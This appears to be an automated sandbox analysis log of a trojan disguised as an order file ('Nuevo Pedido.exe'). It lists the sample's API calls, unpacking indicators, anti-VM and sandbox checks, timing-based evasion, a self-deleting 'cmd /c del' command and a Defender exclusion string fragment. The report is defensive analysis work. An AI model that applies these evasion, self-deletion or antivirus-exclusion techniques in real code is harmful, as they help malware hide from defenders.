            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047BA3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_006185E0 NtCreateFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00618690 NtReadFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00618710 NtClose,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_006187C0 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_006185DA NtCreateFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061870C NtReadFile,NtClose,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_006187BA NtAllocateVirtualMemory,
            Source: Nuevo Pedido.exeBinary or memory string: OriginalFilename vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000000.00000002.242885207.0000000005EF0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000000.00000002.243408230.0000000006390000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exeBinary or memory string: OriginalFilename vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000003.00000002.309549800.0000000001C3F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exeBinary or memory string: OriginalFilenameMethodImplAttribut.exe. vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: Nuevo Pedido.exeVirustotal: Detection: 32%
            Source: Nuevo Pedido.exeReversingLabs: Detection: 33%
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeFile read: C:\Users\user\Desktop\Nuevo Pedido.exe:Zone.IdentifierJump to behavior
            Source: Nuevo Pedido.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\Nuevo Pedido.exe "C:\Users\user\Desktop\Nuevo Pedido.exe"
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess created: C:\Users\user\Desktop\Nuevo Pedido.exe C:\Users\user\Desktop\Nuevo Pedido.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess created: C:\Users\user\Desktop\Nuevo Pedido.exe C:\Users\user\Desktop\Nuevo Pedido.exe
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Nuevo Pedido.exe.logJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@11/6
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6668:120:WilError_01
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
            Source: Nuevo Pedido.exeString found in binary or memory: /MethodImplAttribut;component/views/addbook.xaml
            Source: Nuevo Pedido.exeString found in binary or memory: views/addbook.baml
            Source: Nuevo Pedido.exeString found in binary or memory: /MethodImplAttribut;component/views/addcustomer.xaml
            Source: Nuevo Pedido.exeString found in binary or memory: views/addcustomer.baml
            Source: Nuevo Pedido.exeString found in binary or memory: /MethodImplAttribut;component/views/addbook.xaml
            Source: Nuevo Pedido.exeString found in binary or memory: views/addbook.baml
            Source: Nuevo Pedido.exeString found in binary or memory: /MethodImplAttribut;component/views/addcustomer.xaml
            Source: Nuevo Pedido.exeString found in binary or memory: views/addcustomer.baml
            Source: Nuevo Pedido.exeString found in binary or memory: a/MethodImplAttribut;component/views/addbook.xamlw/MethodImplAttribut;component/views/borrowfrombookview.xamlm/MethodImplAttribut;component/views/borrowingview.xamlg/MethodImplAttribut;component/views/changebook.xamlo/MethodImplAttribut;component/views/changecustomer.xamlk/MethodImplAttribut;component/views/customerview.xamlo/MethodImplAttribut;component/views/deletecustomer.xamle/MethodImplAttribut;component/views/errorview.xamli/MethodImplAttribut;component/views/smallextras.xamli/MethodImplAttribut;component/views/addcustomer.xaml
            Source: Nuevo Pedido.exeString found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Nuevo Pedido.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Nuevo Pedido.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: Nuevo Pedido.exe, Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
            Source: Binary string: cscript.pdb source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: Nuevo Pedido.exe, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.2.Nuevo Pedido.exe.a80000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.0.Nuevo Pedido.exe.a80000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.5.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.2.Nuevo Pedido.exe.de0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_00A892F5 push ds; ret
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_00A89361 push ds; retf
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_00A89347 push ds; ret
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_056356E0 push esp; iretd
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041B822 push eax; ret
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041B82B push eax; ret
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041B88C push eax; ret
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004153E6 push ss; iretd
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041541E push ss; iretd
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041B7D5 push eax; ret
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00DE92F5 push ds; ret
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00DE9347 push ds; ret
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00DE9361 push ds; retf
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A0D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047CD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061B822 push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061B82B push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061B88C push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_006153E6 push ss; iretd
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061541E push ss; iretd
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061B7D5 push eax; ret
            Source: initial sampleStatic PE information: section name: .text entropy: 7.85660170333

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Self deletion via cmd deleteShow sources
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 0.2.Nuevo Pedido.exe.2dd8e9c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nuevo Pedido.exe.2e6b054.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Nuevo Pedido.exe PID: 6320, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000000608604 second address: 000000000060860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 000000000060899E second address: 00000000006089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -6456360425798339s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -240000s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6404Thread sleep count: 834 > 30
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239843s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6404Thread sleep count: 1723 > 30
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6324Thread sleep time: -32847s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239717s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239609s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239499s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239390s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239250s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239139s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239015s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238904s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238781s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238671s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238561s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238452s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238343s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238046s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -237796s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -237437s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -237250s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -236890s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -236781s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6348Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 6388Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\cscript.exe TID: 4140Thread sleep time: -34000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004088D0 rdtsc
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 240000
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239843
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239717
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239609
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239499
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239390
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239250
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239139
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239015
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238904
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238781
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238671
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238561
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238452
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238343
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238046
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 237796
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 237437
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 237250
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 236890
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 236781
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeWindow / User API: threadDelayed 834
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeWindow / User API: threadDelayed 1723
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 240000
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239843
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 32847
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239717
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239609
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239499
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239390
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239250
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239139
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239015
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238904
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238781
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238671
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238561
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238452
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238343
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238046
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 237796
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 237437
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 237250
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 236890
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 236781
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 922337203685477
            Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000005.00000000.290480181.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
            Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000005.00000000.290480181.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: vmware
